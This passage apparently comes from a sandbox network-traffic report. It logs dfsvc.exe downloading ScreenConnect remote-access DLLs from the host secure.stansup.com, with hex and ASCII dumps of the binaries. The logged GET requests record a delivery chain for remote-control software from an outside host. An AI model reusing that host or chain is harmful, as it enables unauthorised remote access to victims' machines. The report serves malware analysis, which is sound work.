                                                                                                                                                                                                                                                        2024-10-25 17:27:43 UTC16384INData Raw: 6e 49 6e 66 6f 73 3e 62 5f 5f 32 38 5f 31 00 3c 3e 39 5f 5f 38 5f 31 00 3c 50 6f 70 75 6c 61 74 65 43 6f 6e 74 65 78 74 4d 65 6e 75 53 74 72 69 70 49 74 65 6d 73 3e 62 5f 5f 38 5f 31 00 3c 3e 63 5f 5f 44 69 73 70 6c 61 79 43 6c 61 73 73 31 35 39 5f 31 00 55 53 45 52 5f 49 4e 46 4f 5f 31 00 3c 52 65 70 6c 61 63 65 57 6e 64 50 72 6f 63 3e 62 5f 5f 31 00 3c 52 75 6e 43 6f 6d 6d 61 6e 64 4c 69 6e 65 50 72 6f 67 72 61 6d 3e 62 5f 5f 31 00 3c 47 65 74 44 65 73 6b 74 6f 70 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 44 65 73 63 65 6e 64 65 6e 74 57 69 6e 64 6f 77 48 61 6e 64 6c 65 73 3e 62 5f 5f 31 00 3c 47 65 74 57 69 6e 64 6f 77 53 74 61 74 69 6f 6e 4e 61 6d 65 73 3e
                                                                                                                                                                                                                                                        Data Ascii: nInfos>b__28_1<>9__8_1<PopulateContextMenuStripItems>b__8_1<>c__DisplayClass159_1USER_INFO_1<ReplaceWndProc>b__1<RunCommandLineProgram>b__1<GetDesktopWindowHandles>b__1<GetWindowHandles>b__1<GetDescendentWindowHandles>b__1<GetWindowStationNames>
                                                                                                                                                                                                                                                        2024-10-25 17:27:43 UTC16384INData Raw: 6c 65 00 4d 6f 76 65 46 69 6c 65 00 70 43 6f 6e 66 69 67 46 69 6c 65 00 54 72 79 55 6e 62 6c 6f 63 6b 46 69 6c 65 00 4c 6f 61 64 52 65 73 6f 75 72 63 65 50 61 63 6b 46 72 6f 6d 46 69 6c 65 00 4d 61 70 46 69 6c 65 00 70 48 65 6c 70 46 69 6c 65 00 70 4f 75 74 70 75 74 46 69 6c 65 00 70 73 7a 46 69 6c 65 00 43 72 65 61 74 65 50 72 6f 66 69 6c 65 00 44 65 6c 65 74 65 50 72 6f 66 69 6c 65 00 75 73 72 69 34 5f 70 72 6f 66 69 6c 65 00 70 70 66 69 6c 65 00 45 52 6f 6c 65 00 72 6f 6c 65 00 41 6c 6c 6f 63 43 6f 6e 73 6f 6c 65 00 46 72 65 65 43 6f 6e 73 6f 6c 65 00 77 42 69 74 73 50 65 72 53 61 6d 70 6c 65 00 6c 70 54 69 74 6c 65 00 41 64 64 41 63 63 65 73 73 52 75 6c 65 00 46 69 6c 65 53 79 73 74 65 6d 41 63 63 65 73 73 52 75 6c 65 00 53 65 74 41 63 63 65 73 73 52
                                                                                                                                                                                                                                                        Data Ascii: leMoveFilepConfigFileTryUnblockFileLoadResourcePackFromFileMapFilepHelpFilepOutputFilepszFileCreateProfileDeleteProfileusri4_profileppfileERoleroleAllocConsoleFreeConsolewBitsPerSamplelpTitleAddAccessRuleFileSystemAccessRuleSetAccessR
                                                                                                                                                                                                                                                        2024-10-25 17:27:43 UTC16384INData Raw: 4c 61 73 74 41 63 74 69 76 65 50 6f 70 75 70 00 41 70 70 44 6f 6d 61 69 6e 53 65 74 75 70 00 70 73 7a 56 65 6e 64 6f 72 53 65 74 75 70 00 66 43 6f 6e 74 65 78 74 52 65 71 00 53 79 73 74 65 6d 2e 4c 69 6e 71 00 50 72 6f 70 56 61 72 69 61 6e 74 43 6c 65 61 72 00 45 6e 73 75 72 65 53 74 61 72 74 73 57 69 74 68 43 68 61 72 00 43 6f 6e 76 65 72 74 42 6f 74 68 53 6c 61 73 68 65 73 54 6f 43 68 61 72 00 44 69 72 65 63 74 6f 72 79 53 65 70 61 72 61 74 6f 72 43 68 61 72 00 70 72 6f 70 76 61 72 00 65 5f 63 70 61 72 68 64 72 00 49 73 4d 65 6d 62 65 72 00 6d 61 67 69 63 4e 75 6d 62 65 72 00 64 77 42 75 69 6c 64 4e 75 6d 62 65 72 00 46 69 6c 65 48 65 61 64 65 72 00 77 61 76 65 49 6e 50 72 65 70 61 72 65 48 65 61 64 65 72 00 77 61 76 65 4f 75 74 50 72 65 70 61 72 65 48
                                                                                                                                                                                                                                                        Data Ascii: LastActivePopupAppDomainSetuppszVendorSetupfContextReqSystem.LinqPropVariantClearEnsureStartsWithCharConvertBothSlashesToCharDirectorySeparatorCharpropvare_cparhdrIsMembermagicNumberdwBuildNumberFileHeaderwaveInPrepareHeaderwaveOutPrepareH
                                                                                                                                                                                                                                                        2024-10-25 17:27:43 UTC16384INData Raw: 6c 79 00 70 6f 69 6e 74 6c 79 00 53 65 6c 65 63 74 4d 61 6e 79 00 53 68 75 74 64 6f 77 6e 42 6c 6f 63 6b 52 65 61 73 6f 6e 44 65 73 74 72 6f 79 00 42 6c 6f 63 6b 43 6f 70 79 00 61 6c 6c 6f 77 43 6f 70 79 00 65 6e 74 72 6f 70 79 00 54 72 79 00 54 6f 6b 65 6e 50 72 69 6d 61 72 79 00 54 6f 44 69 63 74 69 6f 6e 61 72 79 00 4c 6f 61 64 4c 69 62 72 61 72 79 00 46 72 65 65 4c 69 62 72 61 72 79 00 49 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 54 72 79 4c 6f 61 64 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 54 72 79 46 72 65 65 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 57 69 6e 64 6f 77 73 44 69 73 6b 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 57 69 6e 64 6f 77 73 4d 65 6d 6f 72 79 4e 61 74 69 76 65 4c 69 62 72 61 72 79 00 4f 62 6a 65 63 74 51 75 65 72 79 00 53 65 6c
                                                                                                                                                                                                                                                        Data Ascii: lypointlySelectManyShutdownBlockReasonDestroyBlockCopyallowCopyentropyTryTokenPrimaryToDictionaryLoadLibraryFreeLibraryINativeLibraryTryLoadNativeLibraryTryFreeNativeLibraryWindowsDiskNativeLibraryWindowsMemoryNativeLibraryObjectQuerySel


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        10192.168.2.114988079.110.49.1854437652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:46 UTC102OUTGET /Bin/ScreenConnect.ClientService.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:46 UTC215INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 68096
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:46 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:46 UTC16169INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ab 6b f4 c6 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 02 01 00 00 06 00 00 00 00 00 00 ba 20 01 00 00 20 00 00 00 40 01 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 e1 02 02 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELk" 0 @ @
                                                                                                                                                                                                                                                        2024-10-25 17:27:46 UTC16384INData Raw: 00 0a 07 6f 11 00 00 0a 2d d0 de 0a 07 2c 06 07 6f 10 00 00 0a dc 06 7b 54 00 00 04 6f 24 02 00 0a 13 04 2b 5a 11 04 6f 25 02 00 0a 13 05 02 7b 53 00 00 04 7b 0d 00 00 04 11 05 73 26 02 00 0a 25 02 7b 52 00 00 04 28 f8 00 00 0a 7e 30 00 00 04 25 2d 17 26 7e 2b 00 00 04 fe 06 6d 00 00 06 73 06 02 00 0a 25 80 30 00 00 04 28 5f 00 00 2b 6f 27 02 00 0a 73 81 00 00 0a 6f 82 00 00 0a 11 04 6f 11 00 00 0a 2d 9d de 0c 11 04 2c 07 11 04 6f 10 00 00 0a dc 2a 01 1c 00 00 02 00 65 00 34 99 00 0a 00 00 00 00 02 00 b0 00 67 17 01 0c 00 00 00 00 1e 02 28 1d 00 00 0a 2a 56 02 7b 54 00 00 04 03 6f 23 02 00 0a 6f 28 02 00 0a 16 fe 01 2a 1e 02 28 1d 00 00 0a 2a 4a 02 7b 56 00 00 04 6f 29 02 00 0a 03 28 2a 02 00 0a 2a 1e 02 28 1d 00 00 0a 2a 00 00 00 13 30 03 00 43 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: o-,o{To$+Zo%{S{s&%{R(~0%-&~+ms%0(_+o'soo-,o*e4g(*V{To#o(*(*J{Vo)(**(*0C
                                                                                                                                                                                                                                                        2024-10-25 17:27:47 UTC16384INData Raw: 15 19 04 ae 2d 2d 15 19 04 cd 2e 37 15 b1 04 3c 27 3e 15 31 04 cb 31 78 09 29 04 e0 42 f6 00 e9 04 fe 42 56 15 f4 00 9b 18 81 02 31 04 a5 32 5c 15 f4 03 71 3a a1 00 fc 03 71 3a a1 00 19 04 ca 2d 85 15 11 03 71 3a 6a 04 09 03 5e 30 9e 15 d9 07 e5 35 a7 15 09 03 42 2c ad 15 e1 07 6b 29 06 00 19 03 5d 31 20 02 31 04 83 2d bd 15 29 04 84 31 6a 04 19 03 80 25 20 02 29 04 ad 25 6a 04 19 03 99 1b 20 02 29 04 c6 1b 6a 04 e1 07 61 29 06 00 21 03 f7 2e 20 02 d1 00 ea 49 c5 15 29 04 04 2f 6a 04 a9 04 31 3d b2 11 8c 03 8d 08 5a 04 e9 04 b2 49 bd 0a 04 04 f8 3e 46 00 8c 03 52 0b 5e 04 e9 04 cd 42 d8 15 31 04 e2 34 e0 15 29 04 e0 46 14 01 d1 01 9a 42 ef 15 5c 02 de 2c 63 00 09 02 e1 2e 14 01 69 02 c8 41 00 16 69 02 c3 17 14 01 29 05 7a 2d f6 00 59 03 d0 2d 06 16 a4 02
                                                                                                                                                                                                                                                        Data Ascii: --.7<'>11x)BBV12\q:q:-q:j^05B,k)]1 1-)1j% )%j )ja)!. I)/j1=ZI>FR^B14)FB\,c.iAi)z-Y-
                                                                                                                                                                                                                                                        2024-10-25 17:27:47 UTC16384INData Raw: 74 79 41 63 74 69 6f 6e 00 53 79 73 74 65 6d 2e 52 65 66 6c 65 63 74 69 6f 6e 00 53 65 74 74 69 6e 67 73 50 72 6f 70 65 72 74 79 56 61 6c 75 65 43 6f 6c 6c 65 63 74 69 6f 6e 00 47 72 6f 75 70 43 6f 6c 6c 65 63 74 69 6f 6e 00 57 61 69 74 69 6e 67 46 6f 72 43 6f 6e 6e 65 63 74 69 6f 6e 00 57 69 6e 33 32 45 78 63 65 70 74 69 6f 6e 00 43 72 79 70 74 6f 67 72 61 70 68 69 63 45 78 63 65 70 74 69 6f 6e 00 4e 6f 74 53 75 70 70 6f 72 74 65 64 45 78 63 65 70 74 69 6f 6e 00 54 72 61 63 65 45 78 63 65 70 74 69 6f 6e 00 45 6e 64 4f 66 53 74 72 65 61 6d 45 78 63 65 70 74 69 6f 6e 00 52 75 6e 57 69 74 68 43 72 61 73 68 4f 6e 45 78 63 65 70 74 69 6f 6e 00 54 72 79 53 75 62 73 63 72 69 62 65 54 6f 4c 6f 67 41 70 70 44 6f 6d 61 69 6e 45 78 63 65 70 74 69 6f 6e 00 49 6e 76
                                                                                                                                                                                                                                                        Data Ascii: tyActionSystem.ReflectionSettingsPropertyValueCollectionGroupCollectionWaitingForConnectionWin32ExceptionCryptographicExceptionNotSupportedExceptionTraceExceptionEndOfStreamExceptionRunWithCrashOnExceptionTrySubscribeToLogAppDomainExceptionInv
                                                                                                                                                                                                                                                        2024-10-25 17:27:47 UTC2775INData Raw: 08 01 00 00 08 00 00 00 00 05 01 00 01 00 00 05 01 00 02 00 00 0a 01 00 02 00 00 00 00 01 00 00 20 01 00 03 00 00 00 09 53 65 73 73 69 6f 6e 49 44 04 4e 61 6d 65 08 55 73 65 72 4e 61 6d 65 00 00 0d 01 00 05 00 00 00 00 00 00 00 01 00 00 2d 01 00 02 00 00 00 1c 43 72 65 64 65 6e 74 69 61 6c 50 72 6f 76 69 64 65 72 49 6e 73 74 61 6e 63 65 49 44 07 4d 65 73 73 61 67 65 00 00 0b 01 00 03 00 00 00 00 01 01 00 00 33 01 00 03 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 00 00 52 01 00 05 00 00 00 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0b 43 6f 6d 6d 61 6e 64 4c 69 6e 65 0f 50 61 72 65 6e 74 50 72 6f 63 65 73 73 49 44 0e 45 78 65 63 75 74 61 62 6c 65 50 61 74 68 0f
                                                                                                                                                                                                                                                        Data Ascii: SessionIDNameUserName-CredentialProviderInstanceIDMessage3ExecutablePathCommandLineParentProcessIDRExecutablePathCommandLineParentProcessIDExecutablePath


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        11192.168.2.114989179.110.49.1854437652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2024-10-25 17:27:47 UTC93OUTGET /Bin/ScreenConnect.Core.dll HTTP/1.1
                                                                                                                                                                                                                                                        Host: secure.stansup.com
                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC216INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Cache-Control: private
                                                                                                                                                                                                                                                        Content-Length: 548352
                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                        Server: ScreenConnect/24.2.3.8936-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                        Date: Fri, 25 Oct 2024 17:27:47 GMT
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16168INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 69 42 17 f7 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 56 08 00 00 06 00 00 00 00 00 00 c6 70 08 00 00 20 00 00 00 80 08 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 08 00 00 02 00 00 84 a2 08 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELiB" 0Vp @
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 28 2b 00 00 2b 2c 07 02 06 7d 6e 01 00 0a 06 02 7b 6e 01 00 0a fe 01 2a 3e 03 6f 0e 07 00 06 04 6f 0e 07 00 06 fe 01 2a 3e 02 03 28 6f 01 00 0a 02 15 7d 70 01 00 0a 2a 13 30 03 00 33 01 00 00 3d 00 00 11 03 2d 0a 12 01 fe 15 81 00 00 1b 07 2a 02 03 28 71 01 00 0a 0a 03 6f 0e 07 00 06 02 7b 70 01 00 0a fe 01 06 5f 2c 42 02 7b 72 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 74 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 15 7d 70 01 00 0a 02 7c 72 01 00 0a fe 15 81 00 00 1b 12 01 fe 15 81 00 00 1b 07 2a 03 6f 0e 07 00 06 02 7b 70 01 00 0a 33 07 02 7b 72 01 00 0a 2a 06 2c 43 02 7b 76 01 00 0a 8c 81 00 00 1b 2c 18 02 28 73 01 00 0a 02 fe 06 77 01 00 0a 73 75 01 00 0a 28 2c 00 00 2b 26 02 03 6f 0e 07 00 06 7d 78 01 00 0a 02 28 2d 00 00 2b 7d 76 01
                                                                                                                                                                                                                                                        Data Ascii: (++,}n{n*>oo*>(o}p*03=-*(qo{p_,B{r,(stsu(,+&}p|r*o{p3{r*,C{v,(swsu(,+&o}x(-+}v
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 73 c7 02 00 0a 0a 2b 26 03 04 73 c8 02 00 0a 0a 2b 1c 03 04 73 94 01 00 0a 0a 2b 12 72 b9 0c 00 70 02 8c b2 00 00 02 14 73 c9 02 00 0a 7a 06 2a 5a d0 8e 00 00 1b 28 3c 01 00 0a 02 28 ca 02 00 0a a5 8e 00 00 1b 2a 9e 03 02 7e d1 05 00 04 25 2d 17 26 7e d0 05 00 04 fe 06 a0 0e 00 06 73 cb 02 00 0a 25 80 d1 05 00 04 28 7f 00 00 2b 2a 00 1b 30 01 00 25 00 00 00 1e 00 00 11 02 28 cc 02 00 0a 2d 0a 12 00 fe 15 8e 00 00 1b 06 2a 00 03 6f 08 02 00 0a 0a de 07 02 28 2d 01 00 0a dc 06 2a 00 00 00 01 10 00 00 02 00 13 00 09 1c 00 07 00 00 00 00 3a 02 03 28 e2 04 00 06 28 80 00 00 2b 26 2a 00 1b 30 01 00 1a 00 00 00 75 00 00 11 02 0a 06 28 2c 01 00 0a 03 6f 08 02 00 0a 0b de 07 06 28 2d 01 00 0a dc 07 2a 00 00 01 10 00 00 02 00 08 00 09 11 00 07 00 00 00 00 3a 02 03
                                                                                                                                                                                                                                                        Data Ascii: s+&s+s+rpsz*Z(<(*~%-&~s%(+*0%(-*o(-*:((+&*0u(,o(-*:
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 0a 03 6f 8c 01 00 0a 7e e3 05 00 04 25 2d 17 26 7e d0 05 00 04 fe 06 b2 0e 00 06 73 9f 02 00 0a 25 80 e3 05 00 04 28 b3 00 00 2b 28 67 04 00 06 28 72 00 00 2b 2a 6e 03 0f 00 28 14 04 00 0a 81 8e 00 00 1b 04 0f 00 28 15 04 00 0a 81 8f 00 00 1b 2a 3e 1f fe 73 93 0f 00 06 25 02 7d a0 06 00 04 2a ae 02 16 16 16 16 73 20 03 00 06 7e cf 05 00 04 25 2d 13 26 14 fe 06 3d 03 00 06 73 3b 04 00 0a 25 80 cf 05 00 04 28 d4 00 00 2b 2a 82 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 2d 04 16 6a 2b 02 15 6a 28 45 05 00 06 28 d6 00 00 2b 2a 26 02 03 66 5f 04 03 5f 60 2a 76 02 28 d5 00 00 2b 03 28 d5 00 00 2b 04 28 d5 00 00 2b 28 45 05 00 06 28 d6 00 00 2b 2a 3a 05 2c 09 02 03 04 28 d7 00 00 2b 2a 02 2a 00 00 13 30 02 00 13 00 00 00 33 00 00 11 02 28 d5 00 00 2b 03 28 d5 00 00
                                                                                                                                                                                                                                                        Data Ascii: o~%-&~s%(+(g(r+*n((*>s%}*s ~%-&=s;%(+*(+(+-j+j(E(+*&f__`*v(+(+(+(E(+*:,(+**03(+(
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 72 10 14 00 70 a2 25 1b 02 28 51 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1c 72 22 14 00 70 a2 25 1d 02 28 53 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1e 72 34 14 00 70 a2 25 1f 09 02 28 55 07 00 06 0a 12 00 28 96 01 00 0a a2 25 1f 0a 72 32 13 00 70 a2 25 1f 0b 02 28 57 07 00 06 28 4f 0b 00 06 a2 25 1f 0c 72 48 14 00 70 a2 25 1f 0d 02 28 59 07 00 06 0b 12 01 fe 16 29 01 00 02 6f 43 00 00 0a a2 25 1f 0e 72 68 14 00 70 a2 25 1f 0f 02 28 5b 07 00 06 0c 12 02 fe 16 2a 01 00 02 6f 43 00 00 0a a2 25 1f 10 72 80 14 00 70 a2 25 1f 11 02 28 5d 07 00 06 0d 12 03 28 2f 05 00 0a a2 28 2a 02 00 0a 2a 1e 02 28 4c 07 00 06 2a 1e 02 7b a1 02 00 04 2a 22 02 03 7d a1 02 00 04 2a 00 00 13 30 02 00 1f 00 00 00 5a 00 00 11 72 90 14 00 70 02 28 61 07 00 06 0a 12 00 fe 16 c1 00 00
                                                                                                                                                                                                                                                        Data Ascii: rp%(Q(%r"p%(S(%r4p%(U(%r2p%(W(O%rHp%(Y)oC%rhp%([*oC%rp%(](/(**(L*{*"}*0Zrp(a
                                                                                                                                                                                                                                                        2024-10-25 17:27:48 UTC16384INData Raw: 1b 0c 02 7c d7 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 00 00 00 13 30 03 00 29 00 00 00 51 01 00 11 02 7b d7 03 00 04 0a 06 0b 07 03 28 2d 06 00 0a 74 4f 00 00 1b 0c 02 7c d7 03 00 04 08 07 28 82 01 00 2b 0a 06 07 33 df 2a 56 02 28 2f 0a 00 06 02 03 7d d8 03 00 04 02 04 7d d9 03 00 04 2a 1e 02 7b d8 03 00 04 2a 1e 02 7b d9 03 00 04 2a 5a 03 02 28 37 0a 00 06 5a 1e 28 12 04 00 06 02 28 38 0a 00 06 58 2a 86 02 03 04 28 36 0a 00 06 02 05 75 95 00 00 02 7d da 03 00 04 02 05 75 94 00 00 02 7d db 03 00 04 2a 86 02 03 28 63 01 00 0a 03 2c 16 02 7b da 03 00 04 28 0f 04 00 06 02 7b db 03 00 04 28 0f 04 00 06 2a 00 00 13 30 07 00 e6 00 00 00 52 01 00 11 02 04 28 39 0a 00 06 0a 02 28 38 0a 00 06 16 fe 03 0b 02 7b da 03 00 04 2c 67 05 06 5a 0c 02 08 16 28 32
                                                                                                                                                                                                                                                        Data Ascii: |(+3*0)Q{(-tO|(+3*V(/}}*{*{*Z(7Z((8X*(6u}u}*(c,{({(*0R(9(8{,gZ(2
                                                                                                                                                                                                                                                        2024-10-25 17:27:49 UTC16384INData Raw: 07 04 07 6f 03 0c 00 06 02 05 07 6f 02 0c 00 06 28 03 09 00 06 6f 06 0c 00 06 28 fb 0b 00 06 06 6f 11 00 00 0a 2d d2 de 0a 06 2c 06 06 6f 10 00 00 0a dc 2a 01 10 00 00 02 00 07 00 32 39 00 0a 00 00 00 00 b2 02 28 3c 00 00 0a 02 03 7d 3b 04 00 04 02 04 7d 3c 04 00 04 02 05 7d 3d 04 00 04 02 0e 04 7d 3e 04 00 04 02 0e 05 7d 3f 04 00 04 2a 1e 02 7b 3b 04 00 04 2a 1e 02 7b 3c 04 00 04 2a 1e 02 7b 3d 04 00 04 2a 1e 02 7b 3e 04 00 04 2a 1e 02 7b 3f 04 00 04 2a 00 00 00 1b 30 02 00 47 00 00 00 2a 00 00 11 7e 1b 07 00 0a 2d 3a 7e 1c 07 00 0a 0a 06 28 2c 01 00 0a 7e 1b 07 00 0a 2d 1e 28 64 01 00 0a d0 81 00 00 1b 28 3c 01 00 0a 28 0c 05 00 06 6f 8c 0b 00 06 80 1b 07 00 0a de 07 06 28 2d 01 00 0a dc 7e 1b 07 00 0a 2a 00 01 10 00 00 02 00 13 00 27 3a 00 07 00 00 00
                                                                                                                                                                                                                                                        Data Ascii: oo(o(o-,o*29(<};}<}=}>}?*{;*{<*{=*{>*{?*0G*~-:~(,~-(d(<(o(-~*':
                                                                                                                                                                                                                                                        2024-10-25 17:27:49 UTC16384INData Raw: 1a 73 6a 01 00 0a 7a 1e 02 28 3c 00 00 0a 2a 2e 73 a5 0d 00 06 80 30 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 32 02 7b 31 05 00 04 6f 42 01 00 06 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 7f 01 00 0a 6f 7b 01 00 0a 2a 1e 02 28 3c 00 00 0a 2a 36 03 02 7b 88 01 00 0a 6f 7b 01 00 0a 2a 2e 73 ae 0d 00 06 80 36 05 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 03 04 28 56 02 00 06 2a 22 03 04 28 5c 02 00 06 2a 1e 02 28 3c 00 00 0a 2a 00 00 13 30 03 00 1d 00 00 00 b0 01 00 11 02 7b 39 05 00 04 03 16 28 ef 01 00 2b 0a 12 00 1f 64 28 7a 08 00 0a 6f 2f 02 00 06 2a 00 00 00 13 30 03 00 1b 00 00 00 b1 01 00 11 02 7b 39 05 00 04 03 16 28 f0 01 00 2b 0a 12 00 28 7b 08 00 0a 6f 31 02 00 06 2a 36 02 7b 39 05 00 04 03 6f 33 02 00 06 2a 00 00 00 13 30 02 00 1a 00 00 00 b2 01 00 11 02 7b 39
                                                                                                                                                                                                                                                        Data Ascii: sjz(<*.s0*(<*2{1oB*(<*6{o{*(<*6{o{*.s6*(<*"(V*"(\*(<*0{9(+d(zo/*0{9(+({o1*6{9o3*0{9
                                                                                                                                                                                                                                                        2024-10-25 17:27:49 UTC16384INData Raw: 02 7b 23 05 00 0a 28 31 0a 00 0a 2a 1e 02 28 3c 00 00 0a 2a 4a 02 7b 27 05 00 0a 02 7b 28 05 00 0a 28 31 0a 00 0a 2a 2e 73 04 10 00 06 80 23 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 1b 07 00 06 2a 1e 03 6f 43 00 00 0a 2a 2e 73 08 10 00 06 80 26 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 1e 03 6f 43 00 00 0a 2a 2e 73 0b 10 00 06 80 28 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 22 0f 01 28 4b 0b 00 06 2a 3a 0f 01 fe 16 4b 01 00 02 6f 43 00 00 0a 2a 2e 73 0f 10 00 06 80 2b 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 3a 0f 01 fe 16 c1 00 00 02 6f 43 00 00 0a 2a 1e 02 28 3c 00 00 0a 2a 2e 73 13 10 00 06 80 32 07 00 04 2a 1e 02 28 3c 00 00 0a 2a 36 03 03 28 1a 02 00 2b 73 32 0a 00 0a 2a 2a 03 6f 33 0a 00 0a 14 fe 03 2a 5e 03 03 6f 34 0a 00 0a 28 bc 01 00 2b 28 f8 0b 00 06 73 35
                                                                                                                                                                                                                                                        Data Ascii: {#(1*(<*J{'{((1*.s#*(<*o*oC*.s&*(<*oC*.s(*(<*"(K*:KoC*.s+*(<*:oC*(<*.s2*(<*6(+s2**o3*^o4(+(s5
                                                                                                                                                                                                                                                        2024-10-25 17:27:49 UTC16384INData Raw: 27 3d 01 00 6d 00 9a 01 fe 02 09 01 10 00 e6 4f 01 00 27 3d 01 00 6d 00 9e 01 06 03 09 01 10 00 d9 bb 00 00 27 3d 01 00 6d 00 a0 01 14 03 09 01 10 00 96 3a 01 00 27 3d 01 00 6d 00 a2 01 1f 03 09 01 10 00 9c ff 00 00 27 3d 01 00 6d 00 a6 01 46 03 81 01 10 00 cc 3a 01 00 27 3d 01 00 35 00 a9 01 5a 03 01 20 10 00 0e e3 00 00 27 3d 01 00 35 00 ab 01 63 03 01 20 10 00 4d 34 01 00 27 3d 01 00 35 00 ae 01 7b 03 01 00 10 00 e9 7f 00 00 27 3d 01 00 35 00 b1 01 80 03 81 00 10 00 cf fc 00 00 27 3d 01 00 3c 03 b2 01 8a 03 01 00 10 00 8d fe 00 00 27 3d 01 00 24 03 b4 01 95 03 01 00 10 00 96 fd 00 00 27 3d 01 00 24 03 b6 01 99 03 01 00 10 00 fa 7f 00 00 27 3d 01 00 35 00 b6 01 9d 03 01 00 10 00 56 91 00 00 27 3d 01 00 35 00 b7 01 a7 03 01 00 10 00 47 91 00 00 27 3d 01
                                                                                                                                                                                                                                                        Data Ascii: '=mO'=m'=m:'=m'=mF:'=5Z '=5c M4'=5{'=5'=<'=$'=$'=5V'=5G'=


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        12192.168.2.114991079.110.49.1854437652C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
